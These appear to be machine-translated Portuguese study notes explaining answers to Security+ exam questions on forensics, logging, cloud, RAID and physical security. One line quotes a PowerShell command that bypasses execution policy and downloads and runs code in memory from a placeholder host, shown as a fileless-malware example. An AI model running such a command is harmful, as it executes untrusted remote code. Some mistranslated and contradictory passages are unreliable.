Os dados de configuração do Windows podem ser consultados usando o PowerShell, permitindo que Elaine escreva scripts que coletarão dados de configuração de segurança. Bash é um shell usado para sistemas Linux. Embora os sistemas Windows agora possam executar o Bash no subsistema Linux, ele não é instalado por inadimplência. O Secure Shell (SSH) é usado para acesso remoto ao shell, e o Python pode ser usado, mas precisaria ser instalado especificamente para essa finalidade e não está disponível por padrão.
A melhor opção listada é uma captura Wireshark do tráfego do telefone. Em alguns casos, esse tráfego pode ser criptografado, e Ramon pode precisar tomar medidas adicionais para descriptografar o dados. Os logs do gerenciador de chamadas e os logs do SIP (Session Initiation Protocol) não incluem o áudio de uma conversa.
A análise forense de máquinas virtuais geralmente depende de um instantâneo coletado usando o subjacente Recursos de snapshot do ambiente de virtualização. Isso capturará o estado da memória e o disco para o sistema e pode ser executado em um sistema independente ou analisado usando forense Ferramentas.
A ferramenta tcpreplay foi projetada especificamente para permitir que os arquivos de captura PCAP sejam reproduzidos para uma rede, permitindo exatamente esse tipo de teste. hping pode ser usado para criar pacotes, mas ele não foi projetado para reproduzir arquivos de captura. tcpdump é usado para capturar pacotes, mas, novamente, ele não é uma ferramenta de replay, e o Cuckoo é uma ferramenta de sandboxing para testar e identificar malware Pacotes.
Segmentar uma rede com base em níveis de segurança ou risco ajuda a garantir que ataques e comprometimentos sejam restritos ao mesmo tipo de sistemas ou dispositivos com níveis semelhantes de requisitos de segurança. O isolamento removeria um dispositivo ou sistema do contato com a rede ou outros sistemas.
Marcar cada unidade ajuda no inventário e garante que a unidade seja rastreada corretamente e que a cadeia de custódia pode ser mantida. Tirar uma foto pode ser útil para identificar a unidade, mas a marcação e o controle de estoque são mais importantes. As unidades não são rotuladas com uma ordem de volatilidade porque a ordem de volatilidade está associada ao tipo de forense alvo, não com uma unidade específica. As entrevistas podem ser úteis, mas nem sempre são realizadas com cada pessoa cuja máquina é cuja máquina é fotografada.
A procedência de um artefato forense inclui a cadeia de custódia, incluindo a propriedade e aquisição do artefato, dispositivo ou imagem. A descoberta eletrônica é o processo de fazer a descoberta em formatos eletrônicos para litígios, investigações e solicitações de registros. Jurisdição é a região ou área onde as leis ou a aplicação da lei têm autoridade. Volatilidade é a probabilidade de um dispositivo ou componente é para mudar.
O framework Volatility é uma ferramenta desenvolvida especificamente para a aquisição de acesso aleatório memória (RAM) de um sistema ativo. A autópsia é uma ferramenta forense para análise de unidade e forense investigações, dd é usado para unidades de imagem, e netcat é uma ferramenta usada para transferir dados ou para Faça conexões com sistemas em uma rede.
. O Wireshark é um analisador de protocolo de rede e ferramenta de captura que pode ser usado para solução de problemas em circunstâncias como esta. Na verdade, os profissionais de segurança são frequentemente solicitados a verificar Esse tráfego está sendo recebido corretamente como parte da solução de problemas da regra de firewall. Randy pode deseja capturar o tráfego em ambas as extremidades da comunicação para garantir que os clientes estejam enviar o tráfego corretamente e, em seguida, correspondê-lo ao mesmo tráfego que está sendo recebido — ou indo ausente — na outra ponta. Tracert e TraceRoute são úteis para validar a rota esse tráfego leva, mas não mostraria se os pacotes HTTPS estavam sendo bloqueados, e o Sn1per é um estrutura de teste de caneta que permite testes automatizados de caneta.
. A ferramenta mais antiga e menos capaz listada é o syslog, a ferramenta de registro do sistema original para Sistemas Linux e Unix. As outras três opções têm recursos avançados, o que significa que eles são implementados de forma mais ampla quando flexibilidade e confiabilidade são necessárias.
A única ferramenta nesta lista que pode ser usada para criar pacotes é hping. Susan poderia usar o código de exemplo ou exploit criando o pacote necessário com hping e, em seguida, enviando-o para um servidor DHCP (Dynamic Host Configuration Protocol) em sua rede durante o monitoramento com seu sistema de prevenção de intrusão (IPS). Ela pode querer capturar todo o seu tráfego com Wireshark ou tcpdump para observar o que acontece em ambas as extremidades também.
Risco de controle é um termo utilizado na contabilidade pública. É o risco que surge de um potencial falta de controles internos dentro de uma organização que possa causar uma distorção relevante em os relatórios financeiros da organização. Nesse caso, a falta de controles que validassem o Os dados e a função do sistema financeiro são um risco de controle.
Informações confidenciais são classificadas pelo governo dos EUA como informações que requer alguma proteção e que, se divulgada sem autorização, causaria danos identificáveis à segurança nacional. As informações ultrassecretas exigem o mais alto grau de proteção e causariam danos excepcionalmente graves se expostas sem autorização. Segredo As informações requerem um grau substancial de protecção e podem causar danos graves se exposto.
Os números de telefone identificam exclusivamente os indivíduos, tornando-os um exemplo de informações identificáveis, ou PII. PHI é protegido informações de saúde, informações financeiras inclui registros financeiros de todos os tipos, e informações governamentais são informações que pertence ao governo ou pode ser classificado pelo governo e confiado a uma organização.
Os avisos de privacidade são frequentemente incluídos em sites para atender aos requisitos de leis ou regulamentos, como o Regulamento Geral de Proteção de Dados (GDPR) ou leis estaduais de privacidade.
Minimizar a quantidade de dados coletados é a primeira etapa para garantir que as organizações possam lidar com o volume e os tipos de dados com os quais trabalham. Depois disso, classificando-o e, em seguida, determinar por quanto tempo você o retém também são partes importantes do ciclo de vida dos dados.
As tentativas de injeção de SQL são enviadas como solicitaçõesHTTP ou HTTPS para um servidor Web, ou seja, que Valerie será capaz de ver os ataques no log do servidor web. Sistema de Nomes de Domínio Os logs (DNS), se disponíveis, não os mostrarão. Os logs de autenticação mostram logons, não a Web ou o SQL Server consultas ou solicitações. Ao contrário do Windows, não há nenhum arquivo de log de segurança para Linux, embora haja um log seguro para alguns sistemas.
Uma notificação de retenção legal informará a empresa de que eles devem preservar e proteger informações relacionadas ao caso.
netstat pode mostrar todas as conexões ativas, e usando o sinalizador -a fará isso. netstatnão fornece um sinalizador de comando -c. O comando route é usado para modificar e exibir
a tabela de roteamento do sistema. hping é um analisador de pacotes e ferramenta de construção de pacotes frequentemente usado para criar pacotes específicos como parte de testes de penetração e ataques.
Embora os sistemas Linux possam usar um arquivo para swap space, uma solução comum é usar uma partição separada para swap space
. O sinalizador -v para netcat o define como modo detalhado. Isso significa que Isaac tentou Conecte-se a todas as portas de 1 a 1024 em 10.11.10.1 usando o NetCat. Já que não há outro sinalizadores ou opções, ele simplesmente tentará se conectar e, em seguida, fornecerá um resultado detalhado sobre o que aconteceu, resultando em uma varredura de porta simples, mas eficaz
As cláusulas de direito de auditoria são comumente aceitas como parte dos contratos de serviços e locação financeira independentemente da localização para contratos de co-location e aluguel de instalações de datacenter. Serviço de nuvem Os provedores, no entanto, são menos propensos a assinar um contrato de direito de auditoria. Em vez disso, eles podem fornecer dados de auditoria de terceiros para clientes ou até mesmo para clientes em potencial.
Das opções listadas, netstat é a única ferramenta que não executará uma varredura de porta.
Descoberta eletrônica, ou e-discovery, é o processo legal envolvido em litígio, FoIA e esforços similares que produzam informações em formato eletrônico. Análise forense de e-mail poderia ser necessário recuperar dados em uma investigação, mas não há nenhuma indicação no questão de eventual necessidade de perícia. Inquisições e procedência não são conceitos para o exame Security+.
A melhor opção para Alaina seria usar um filtro de URL para bloquear a visita dos usuários o link no e-mail de phishing. Um WAF, ou firewall de aplicativo Web, foi projetado para impedir Ataques contra um aplicativo Web. A aplicação de patches pode ajudar a impedir explorações de serviços vulneráveis ou sistemas, mas este é um ataque de phishing, e uma lista de permissões lista itens permitidos, não bloqueados e limitar quais sites uma empresa inteira pode visitar é quase impossível na maioria Circunstâncias.
Os playbooks listam as ações que uma organização tomará como parte de um processo de resposta. Um runbook lista as etapas necessárias para executar uma ação como notificação, remoção de malware, ou tarefas semelhantes. Playbooks tendem a ser usados para documentar processos, enquanto runbooks tendem a a ser utilizado para ações específicas.
Como os endereços MAC só são visíveis dentro de um domínio de difusão (rede local), o Endereços MAC de hosts externos não podem ser recuperados usando o comando arp. O MAC endereços para sistemas locais, os endereços IP do host local e se eles são dinâmicos ou estático pode ser determinado usando o comando arp.
. A ferramenta journalctl é usada para consultar o diário systemd. No Linux habilitado para systemd distribuições, o diário contém mensagens de kernel e inicialização, bem como mensagens syslog e mensagens de serviços.
A fase de recuperação geralmente envolve a adição de regras de firewall e sistemas de aplicação de patches à reconstrução de sistemas. Embora a preparação possa envolver a configuração de regras de firewall ou patches regulares, ela não o faz em resposta a um incidente. A contenção pode envolver ambos, mas é menos provável, uma vez que o foco será em correções mais amplas, e a erradicação funciona para remover a ameaça.
A ferramenta de linha de comando curl suporta downloads e uploads de uma ampla variedade de serviços, e seria a solução ideal para esse cenário. hping é usado para a criação pacotes, nmap é um scanner de portas, e theHarvester é uma coleta de inteligência de código aberto ferramenta, nenhuma das quais atende às necessidades de Gary.
Gary deve olhar para as informações de tendência para detecções de malware para verificar se Há mais infecções sendo detectadas do que nas últimas semanas. Isso pode ser útil indicador de uma mudança, seja devido a uma nova técnica de malware ou pacote, um sucesso ataque que resultou em membros da equipe clicando em links maliciosos ou abrindo mal-intencionados e-mails ou outros caminhos para a organização. Gary poderia então verificar com os usuários cujos sistemas relataram o malware para ver o que havia ocorrido. Alertas Os alertas podem mostrar as infecções, mas não mostraria os dados ao longo do tempo tão facilmente quanto as tendências. Sensores mostrarão lugares individuais Os dados são coletados e os painéis de largura de banda podem mostrar informações úteis sobre quais sistemas estão usando mais ou menos largura de banda, mas o painel de tendências continua sendo o lugar certo para ele para olhar nessa situação.
Aaron deseja usar uma ferramenta de registro multiplataforma que suporte Windows e Unix/ Sistemas Linux e muitos formatos de log. Qual das seguintes ferramentas ele deve usar para garantir que seu ambiente de log pode aceitar e processar esses logs? B. A única opção nesta lista que suporta os requisitos de Aaron é o NXLog. Syslog pode receber eventos do Windows se eles forem convertidos em syslog, mas não é um recurso nativo. IPFIX é Um padrão de fluxo de rede e JournalCTL é usado para acessar o diário systemd.
Embora possa parecer estranho à primeira vista, tanto o SourceForge quanto o GitHub são usados para hospedar exemplo de código de exploração, bem como outras informações que os analistas de inteligência de ameaças podem encontrar útil. Eles não fazem parte da dark web, nem são um compartilhamento automatizado de indicadores (AIS). fonte ou um centro público de compartilhamento de informações
powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient). DownloadString('https://example.com/file.psl)
O código é um exemplo de script do PowerShell que baixa um arquivo na memória. Você pode descartar as opções de upload lendo o script, pois ele menciona um download no exemplo de roteiro. Como vemos uma string sendo baixada, em vez de um arquivo e local, você talvez consiga adivinhar que este é um exemplo de malware sem arquivo
. Os IDs de sessão devem ser exclusivos para usuários e sistemas distintos. Um tipo de sessão muito básico O ataque de repetição envolve fornecer à vítima um ID de sessão e, em seguida, usar esse ID de sessão depois de usarem o link e se autenticarem. Proteções como tempo limite de sessão e criptografia de dados de sessão, bem como codificação do IP de origem, nome do host ou outras informações de identificação na chave de sessão, podem ajudar a prevenir ataques de repetição de sessão.
Arquitetura and design:
Counter mode:
quantum cryptograph
blockchain’s public ledger
Tanto o Advanced Encryption Standard (AES) quanto o Data Encryption Standard (DES) são bloquear cifras. Isso significa que eles criptografam grupos (blocos) de símbolos de texto simples juntos como um único bloco.
Os gateways de trânsito são um hub de trânsito usado para conectar VPCs (nuvens virtuais privadas) a redes locais.
Dipositivos Iot: Configurações de linha de base, de acordo com NIST 800-53: “As configurações de linha de base servem como base para futuras compilações, lançamentos e/ou alterações nos sistemas de informação.
A criptografia simétrica é tipicamente mais rápida do que a criptografia assimétrica. É por isso que muitos os protocolos usam criptografiaassimétrica para trocar uma chave simétrica e, em seguida, usam essa chave para o resto de sua transação.
A entropia é uma medida de incerteza. Ter fontes de entropia (ou aleatoriedade) é uma chave em um PRNG.
Com o modelo de software como serviço (SaaS), o consumidor tem a capacidade de usar aplicativos fornecidos pelo provedor de nuvem pela Internet. SaaS é um serviço de assinatura onde o software é licenciado por assinatura.
A plataforma como serviço (PaaS) fornece a estrutura e as ferramentas subjacentes para criar aplicativos e serviços.
Infraestrutura como serviço (IaaS) fornece os componentes de toda uma infraestrutura de rede e sistemas.
Híbrido os modelos usam sistemas hospedados na nuvem e localmente.
D. A replicação de SAN (Storage Area Network, rede de armazenamento de dados) copia o conteúdo de um repositório para outro repositório, como o ambiente SAN central de uma organização para uma SAN remota na nível de hardware ou bloco.
Uma gaiola de Faraday, batizada em homenagem ao físico Michael Faraday, envolve a colocação de malha de arame em torno de uma área ou dispositivo para bloquear sinais eletromagnéticos.
RAID nível 5 é striping de disco com paridade distribuída. Pode suportar a perda de qualquer um disco. RAID 0 é distribuição de disco; não fornece qualquer tolerância a falhas.
RAID 1 é espelhamento. Ela protege contra a perda de um único disco, mas não com paridade distribuída.
RAID 3 é disco striping com paridade dedicada. Isso significa uma unidade dedicada contendo todos os bits de paridade.
RAID 1+0, ou RAID 10, é um conjunto de dados espelhados (RAID 1), que é então distribuído (RAID 0): uma "faixa de espelhos".
RAID 6 é striping de disco com paridade dupla (distribuído), RAID 0 é apenas striping, e RAID 1 é apenas espelhamento.
D. RAID 6, striping de disco com paridade dupla, usa um mínimo de quatro discos com distribuídos bits de paridade. RAID 6 pode lidar com até dois discos falhando. RAID 3 é striping em nível de byte com paridade dedicada e não pode tolerar mais de uma única unidade falhando. RAID 0 é disco striping, que não pode lidar com falha de disco, e RAID 5, striping de disco com paridade distribuída, pode lidar com apenas um disco com falha.
Baselining é o processo de estabelecer um padrão de segurança.
Hardening é o processo de proteção um determinado sistema, mas não estabelece padrões de segurança.
Telemetria falsa é a telemetria criada para fazer um invasor acreditar que um sistema honeypot é um sistema legítimo.
A normalização é o processo de remoção de dados duplicados ou redundantes de um banco de dados.
Desprovisionamento é um termo de virtualização para removendo um sistema virtual (servidor, estação de trabalho, etc.) e recuperando esses recursos, e em contexto do gerenciamento de identidades significa remover uma conta ou permissões.
O Remote Authentication Dial-in User Service (RADIUS) fornece autenticação, autorização e contabilidade, que compõem os três elementos críticos em sistemas AAA.
Os procedimentos armazenados são a melhor maneira de padronizar o SQL. Em vez de programadores escrevendo seus próprios comandos SQL, eles simplesmente chamam os procedimentos armazenados que o banco de dados administrador cria. A inspeção formal de código pode detectar a falta de práticas de segurança e defende, mas não interrompe ataques baseados em SQL.
. A integração de serviços em ambientes de nuvem e virtualização pode ser muito complexa e pode envolver dados, APIs e outros tipos de integração de aplicativos. Plataformas de integração permitir que as organizações usem uma ferramenta padronizada em vez de criar e manter suas possuir. Isso permite que eles se concentrem nas integrações reais em vez do sistema subjacente, economizando tempo e esforço.
Quando a virtualização chega ao ponto em que a TI não pode mais gerenciá-la com eficiência, o condição é conhecida como expansão VM. A sobrecarga de VM e a propagação de VM são compensadas por isso pergunta, e um zumbi VM é um termo para uma máquina virtual que está sendo executada e consumindo recursos, mas não tem mais um propósito.
O escape de VM é uma situação em que um invasor é capaz de passar pela VM para interagir diretamente com o hipervisor e, potencialmente, com o sistema operacional do host. A melhor maneira de evitar isso é limitar a capacidade do host e da VM de compartilhar recursos. Se possível, eles não devem compartilhar recursos. A aplicação de patches pode atenuar a situação, mas não é a maioria solução eficaz. Usar firewalls e ferramentas antimalware é uma boa prática de segurança, mas êm um efeito mínimo na mitigação.
As arquiteturas sem servidor não exigem um administrador do sistema porque o provedor gerencia o recurso FaaS (função como serviço) subjacente. Ele também pode aumentar ou reduzir a escala conforme necessário, permitindo que seja muito flexível. Arquiteturas sem servidor normalmente não são ideais para aplicativos complexos e, em vez disso, tendem a funcionar melhor para microsserviços.
Um sumidouro DNS (Sistema de Nomes de Domínio) é um servidor DNS usado para falsificar servidores DNS que normalmente resolveria um nome de host indesejado para mal-intencionado. O tráfego pode ser enviado para um sistema legítimo, fazendo com que avisos apareçam na tela do usuário, ou simplesmente enviado para uma rota nula ou sistema inexistente.
Corredor quente/corredor frio é um projeto de layout para racks de servidores e outros equipamentos de computação em um datacenter. O objetivo de uma configuração de corredor quente/corredor frio é economizar energia e reduzir custos de resfriamento gerenciando o fluxo de ar. Uma câmera infravermelha detectará os níveis de calor nos corredores
A rede definida por software (SDN) torna a rede muito escalável. É relativamente fácil para adicionar novos recursos ou remover recursos desnecessários, e isso ajuda com a alta disponibilidade .
A rede definida por software (SDN) é uma abordagem de infraestrutura de TI que abstrai os recursos de rede para um sistema virtualizado. Ela separa as funções de encaminhamento e de controle de rede para criar uma rede que possa ser gerenciada e programada de maneira central. Com a SDN, as equipes de operações de TI controlam o tráfego de rede em topologias complexas por meio de um painel centralizado. Assim, elas não precisam gerenciar cada dispositivo de rede manualmente.
As arquiteturas de microsserviços criam aplicativos como um conjunto de serviços fracamente acoplados que fornecem funções específicas usando protocolos leves. Ele não define especificamente o tamanho do sistemas, mas não é um ambiente fortemente acoplado. A escolha de protocolos geralmente é baseada em padrões abertos, mas a ênfase é em protocolos leves. Não há uma exigência de que os serviços ser interno ou exclusivo de terceiros.
Um agente de segurança de acesso à nuvem (CASB) é usado para monitorar a atividade e o uso da nuvem e para Aplicar políticas de segurança aos usuários de serviços de nuvem.
A resposta correta é implementar o IaC. Infraestrutura como código (IaC) é o processo de gerenciamento e provisionamento de datacenters de computadores por meio de arquivos de definição legíveis por máquina, em vez de configuração de hardware físico ou ferramentas de configuração interativas. Se o Datacenter(s) usam máquinas físicas ou máquinas virtuais, essa é uma maneira eficaz de gerenciar os datacenters. Embora os gerentes de datacenter possam ser necessários, isso não necessariamente fornecerá gerenciamento consistente em toda a empresa.
OAuth é um serviço de autorização comum usado para serviços de nuvem. Permite que os usuários decidam a quais sites ou aplicativos confiar suas informações sem exigir que Forneça a senha do usuário. OpenID é frequentemente emparelhado com OAuth como a camada de autenticação. O Kerberos é usado com mais frequência para autenticação no local e o SAML é Segurança Linguagem de marcação de asserção.
Os sistemas que Keith implantou são thin clients, computadores que não executam seus aplicativos e armazenamentode suas unidades locais e, em vez disso, dependem de um servidor remoto. Nuvem e as implementações de virtualização desse fornecimento de desktops virtuais são chamadas de VDI, ou Infraestrutura de área de trabalho virtual, mas não necessariamente exigem um thin client, já que podem trabalhar em um computador totalmente capaz (ou thick client). Cliente-como-servidor é um termo inventado.
Chris está projetando um sistema embarcado que precisa fornecer comunicações ponto a ponto de baixo consumo de energia. Qual das seguintes tecnologias é mais adequada para este fim?
Zigbee é projetado especificamente para este tipo de uso. Rádios de banda estreita não são tipicamente em uso para este tipo de finalidade, e rádio de banda base requer antenas muito grandes para usar o espectro de baixa frequência.
A criptografia homomórfica pode executar cálculos no texto cifrado sem acesso para a chave privada com a qual o texto cifrado foi criptografado. Quando os cálculos são Os resultados são os mesmos que se esses cálculos tivessem sido realizados contra o texto simples original.
Os backups em fita são a solução mais comum para backups a frio fora do local. Backups na nuvem para
Um repositório frio são opções cada vez mais populares e podem ser mais rápidas para alguns cenários de recuperação, mas não estão listadas como opções. SAN (Storage Area Network, rede de armazenamento de dados) e conectada à rede
Os dispositivos de armazenamento (NAS) não são comumente usados para backup a frio e, em vez disso, são usados para opções online ou nearline. O backup em disco pode ser usado, mas continua sendo menos comum do que a fita para um verdadeiro cenário de backup a frio.
Os backups em fita são a solução mais comum para backups a frio fora do local. Backups na nuvem para Um repositório frio são opções cada vez mais populares e podem ser mais rápidas para alguns cenários de recuperação, mas não estão listadas como opções. SAN (Storage Area Network, rede de armazenamento de dados) e conectada à rede Os dispositivos de armazenamento (NAS) não são comumente usados para backup a frio e, em vez disso, são usados para opções online ou nearline. O backup em disco pode ser usado, mas continua sendo menos comum do que a fita para um verdadeiro cenário de backup a frio.
Os sistemas embarcados podem trazer uma ampla gama de implicações de segurança, muitas das quais são impulsionados pelos recursos limitados dos processadores e hardware, eles são frequentemente construídos com. Projetos de baixo consumo de energia podem não ter poder computacional e, portanto, ter desafios para implementar criptografia forte, conectividade de rede e outros problemas semelhantes. A aplicação de patches em sistemas embarcados pode ser um desafio tanto por causa de onde eles são implantados quanto por por causa da falta de conectividade para eles – na verdade,Em muitos ambientes, você pode não querer os dispositivos a serem conectados à sua rede. Já que muitos não têm tela, teclado ou um conexão de rede, autenticação também é um problema. Poucos dispositivos embarcados, no entanto, precisam armazenamento a granel, tornando a falta de armazenamento em massa um problema que normalmente não é uma grande preocupação.
Os dispositivos System on a chip (SoC) são sistemas completos e independentes em um único chip. Portanto, ter suas próprias chaves criptográficas exclusivas é a melhor maneira de implementar autenticação e segurança. A opção A está incorreta. Um sistema em um chip é autônomo, portanto, um Confiável O TPM (Platform Module) não seria uma solução apropriada. A opção C está incorreta. Uma unidade de autocriptografia (SED) não é relevante para o sistema em um chip, uma vez que esse sistema não tem um "Dirija-se".
Esses sistemas precisam ter todas as comunicações criptografadas. A partir da data atual, as violações dos dispositivos de rede portáteis envolveram comunicações não criptografadas .
Uma vantagem da compilação de software é que você pode executar a análise estática de código. Isso significa que Amanda pode revisar o código-fonte em busca de falhas e pode até mesmo corrigir falhas se elas foram encontrados. Tanto binários quanto código compilado podem ser testados em um ambiente dinâmico (dinâmico análise), e checksums para ambos podem ser validados.
RFCs, ou solicitações de comentários, são como os protocolos da Internet são definidos e documentados.
As convenções de nomenclatura padrão normalmente não ajudam a ocultar os sistemas dos invasores.
Os invasores ainda podem procurar sistemas e podem até usar a convenção de nomenclatura para
identificar a finalidade de um sistema se a convenção de nomenclatura incluir uma finalidade ou tecnologia no nome. As convenções de nomenclatura facilitam a padronização e podem ajudar os administradores a identificar rapidamente o que uma máquina faz, ao mesmo tempo em que simplificam a inclusão de sistemas em Scripts.
Uma nuvem comunitária apresenta uma solução de compromisso. As nuvens comunitárias são semiprivadas. Eles não são acessíveis ao público em geral, mas apenas a uma pequena comunidade de Entidades. Há riscos com nuvens públicas, como há com qualquer ambiente. Nuvens privadas pode ser muito caro de construir, especialmente para organizações menores que não podem pagar pessoal ou hardware.
Usar infraestrutura como serviço (IaaS) faz mais sentido aqui; Atende a nuvem requisito descrito e que permita a criação rápida de sistemas adicionais ou removido conforme necessário.
Um dos perigos da automação e do script é que os scripts farão exatamente o que eles são escritos para fazer. Isso significa que um roteiro como os que Corrine foi perguntado escrever que não tem regras que impeçam o bloqueio de sistemas críticos poderia bloquear esses sistemas.
Os backups diferenciais fazem backup de todas as alterações desde o último backup completo. Um incremental backup faz backup de todas as alterações desde o último backup incremental. Um instantâneo captura o estado da máquina e a unidade completa em um nível bit a bit, e os backups completos são uma cópia completa de um mas normalmente não incluem o estado da memória.
A resposta correta é uma nuvem pública. As nuvens públicas costumam ser mais baratas. A nuvem
provedor tem um número de clientes e os custos são dispersos. Até mesmo indivíduos podem pagar
para usar o armazenamento em nuvem com serviços como iCloud e Amazon Cloud. Uma nuvem de comunidade é geralmente privado para um pequeno grupo de parceiros. Cada um dos parceiros deve partilhar uma parte maior da despesa do que com uma nuvem pública, mas eles mantêm mais controle sobre o nuvem do que fariam com uma nuvem pública. Nuvens privadas costumam ser as mais caras para organizações menores. A empresa deve desenvolver e manter completamente a nuvem e não pode aproveitar recursos compartilhados. Um modelo de implantação híbrida é um bom compromisso para muitas situações, mas normalmente será mais caro do que uma nuvem pública para uma pequena organização.
A taxa de erro cruzado (CER) é o ponto em que a FAR (taxa de falsa aceitação) e o cruzamento FRR (falsa taxa de rejeição). O CER fornece um meio de comparar sistemas biométricos com base em sua eficiência, sendo mais desejável um RCE mais baixo.
. Uma fonte de alimentação ininterrupta (UPS) deve ser a primeira prioridade de Natanael. Garantir que a energia não é interrompida durante uma interrupção e pode ser mantida por um curto período até energia alternativa como um gerador pode entrar em linha é fundamental, e um nobreak pode fornecer isso capacidade. Um gerador sozinho levará mais tempo para ficar on-line, resultando em uma interrupção. Dual As fontes de alimentação podem ajudar a construir resiliência, permitindo várias fontes de energia e evitando Problemas se uma fonte de alimentação falhar, mas mas esse não é o foco da questão. Um gerenciado unidade de distribuição de energia (PDU) fornece gerenciamento remoto e monitoramento de energia, mas irá não evitar a perda de energia em uma interrupção.
A expansão da máquina virtual(VM) refere-se a uma situação em que a rede tem mais máquinas que a equipe de TI pode gerenciar com eficiência.
Os procedimentos armazenados são comumente usados em muitos sistemas de gerenciamento de banco de dados para conter Instruções SQL. O administrador de banco de dados (DBA) ou alguém designado pelo DBA, cria as várias instruções SQL necessárias nesse negócio e, em seguida, programadores pode simplesmente chamar os procedimentos armazenados.
Os postes são grandes barreiras que muitas vezes são feitas de substâncias fortes, como concreto. Eles são eficazes para impedir que um veículo seja conduzido para dentro de um prédio. Nenhum dos outros as respostas correspondem ao propósito de um poste.
Os ataques de escape de máquina virtual (VM) dependem de uma falha no hipervisor que pode permitir
um invasor para atacar o próprio hipervisor. As práticas recomendadas típicas de administração do sistema podem: ajuda, incluindo a aplicação regular de patches do hipervisor, mas no caso de uma fuga bem-sucedida ataque, limitando o dano mantendo VMs do mesmo nível de sensibilidade isoladas para o mesmo O host pode evitar um impacto mais amplo. Antivírus é sempre uma boa ideia e pode até parar alguns VM baseada em malware escapa de ataques, mas isolada mas isolar a VM é mais eficaz. Disco cheio (FDE) não terá efeito, uma vez que o disco deve ser descriptografado durante a operação. Um TPM (Trusted Platform Module) é usado para armazenar chaves criptográficas.
Os provedores de serviços de segurança gerenciados (MSSPs) são uma empresa externa que lida com tarefas de segurança. Algumas ou mesmo todas as tarefas de segurança podem ser terceirizadas, incluindo gerenciamento de detecção e prevenção de intrusões (IDS/IPS), informações de segurança e gerenciamento de eventos (SIEM) integração e outros controles de segurança. A rede definida por software (SDN) tornar o gerenciamento de segurança um pouco mais fácil, mas seria difícil de implementar. Automatizar o máximo de atividade de segurança que for prático ajudaria a todos.
Os hashes criptográficos são usados para verificação de integridade de arquivos, pacotes de rede e um variedade de outras aplicações. Armazenando um hash criptográfico do aplicativo e comparando o aplicativo na rede para esse hash confirmará (ou refutará) se o aplicativo oi alterado de alguma forma. Detecção de intrusão de rede ou prevenção de intrusão de rede (NIPSs/NIDSs) são úteis, mas não impedem que um aplicativo seja alterado.
O Transport Layer Security (TLS) fornece um método confiável de criptografia do tráfego da Web. Ela suporta autenticação mútua e é considerado seguro. Embora Secure Sockets Layer (SSL) pode criptografar o tráfego da web, TLS foi criado em 1999 como seu sucessor. Embora muitos administradores de rede ainda usem o termo SSL, na maioria dos casos hoje o que você está usando é na verdade TLS, não o SSL desatualizado. PPTP e IPSec são protocolos para estabelecer uma VPN, não para criptografar o tráfego da Web.
. Nora estabeleceu um local frio. Um local frio é um local que pode ser colocado on-line, mas não possui sistemas; Os locais frios normalmente têm acesso a energia e largura de banda, mas eles precisam estar totalmente equipados para operar após um desastre, já que são apenas espaços alugados. Quente os sites têm parte ou toda a infraestrutura e sistemas de que Nora precisa, mas não tem dados. Um hotsite é um ambiente totalmente funcional com todo o hardware, software e dados necessário para operar uma organização.
O Windows chama o ponto que ele salva para retornar a uma configuração em boas condições de um sistema ponto de restauração. Matt deve definir um antes de instalar um novo software ou aplicar patches se ele estiver preocupado com o que pode ocorrer.
TOTP, ou senha única baseada em tempo, os algoritmos dependem da precisão do tempo entre ambos os hosts de autenticação. Isso significa que, se um sistema ou dispositivo não estiver sincronizado corretamente com um servidor de horário autoritativo e correto, ou se a hora do sistema local tiver se desviado, A autenticação pode falhar. Embora os sistemas TOTP tenham alguma flexibilidade, um relógio que é suficientemente incorreto causará um problema. Senha de uso único baseada em HMAC (HOTP) e sistema multifatorial baseado em serviço de mensagens curtas (SMS) sistemas multifatoriais baseados não sofrem com esse problema.
Os recursos de detecção de objetos podem detectar tipos ou classes específicos de objetos e podem ser usado para determinar se o objeto é movido. Nesse caso, Nina poderia habilitar a detecção de objetos para notificá-la quando os pacotes forem entregues, e ela poderá selecionar especificamente um objeto para monitorar para segurança adicional. Os recursos de infravermelho são úteis em situações de pouca luz, a detecção de movimento ajuda a preservar o espaço de armazenamento, gravando apenas quando ocorre movimento, E o reconhecimento facial pode ajudar o reconhecimento facial pode ajudar a identificar indivíduos específicos, mas não ajudará com pacotes.
Uma gaiola de Faraday é uma malha metálica projetada para bloquear interferências eletromagnéticas (IME). Nenhuma das outras respostas descreve para que uma gaiola de Faraday é usada ou capaz.
Smartcards emparelhados com fechaduras eletrônicas podem ser usados para permitir a entrada em um edifício. O sistema de cartão inteligente também pode armazenar informações sobre o usuário e, portanto, o sistema pode registrar quem entra no prédio.
Embora as fechaduras eletrônicas ofereçam uma série de vantagens, incluindo a capacidade de fornecer códigos diferentes ou acesso a diferentes usuários e a capacidade de desprovisionar o acesso, eles também Requer energia, seja na forma de uma bateria ou energia constantemente fornecida a partir de uma energia fonte. Isso significa que a perda de energia pode causar problemas, seja devido ao bloqueio permanecer bloqueado ou padrão para um estado aberto.
Gerenciar o esquema de endereço IP e o uso de sua organização permitirá que Kara identifique dispositivos desconhecidos e potencialmente desonestos. Os endereços IP não são usados para proteger chaves de criptografia, E o gerenciamento de um esquema não ajudará a evitar ataques de negação de serviço. Mantendo o controle de quais endereços IP estão em uso podem ajudar a evitar o esgotamento do endereço IP, mas isso não fornece uma vantagem de segurança direta.
Das fechaduras listadas aqui, os deadbolts são os mais seguros. O deadbolts vai para o moldura da porta, tornando-a mais segura. Se uma fechadura usa uma chave ou combinação não mudar o quão seguro ele é. Key-in-knob é muito comum, e geralmente fornece menos resistência ao bypass do que uma solução baseada em deadbolt. Por fim, os cadeados podem ser cortados com cortadores de parafusos comuns.
O agrupamento de NIC pode fornecer maior taxa de transferência enviando tráfego por meio de várias placas de interface de rede (NICs) e, ao mesmo tempo, garantindo que a perda de uma placa não cause uma interrupção, proporcionando assim tolerância a falhas.
Taxa de falsa aceitação (FAR) é a taxa na qual o sistema permite incorretamente em alguém não deveria. Esta é claramente uma preocupação significativa. Qualquer erro é uma preocupação, mas o falso A taxa de rejeição é menos problemática do que a taxa de falsa aceitação. A taxa de erro cruzada (CER) é quando o FAR e a taxa de falsa rejeição (FRR) se tornam iguais. Isso indica um funcionamento consistente do sistema biométrico. A taxa de erro igual é outro nome para taxa de erro cruzado.
Os dispositivos de baixo consumo de energia normalmente têm velocidade limitada do processador, memória e armazenamento, o que significa que a criptografia pode ser um desafio. Felizmente, existem soluções que implementam recursos de processamento criptográfico de baixo consumo de energia e avanços contínuos no processador O design continua a tornar os processadores de baixo consumo mais rápidos e eficientes.Limitações legais normalmente não leva em conta se um dispositivo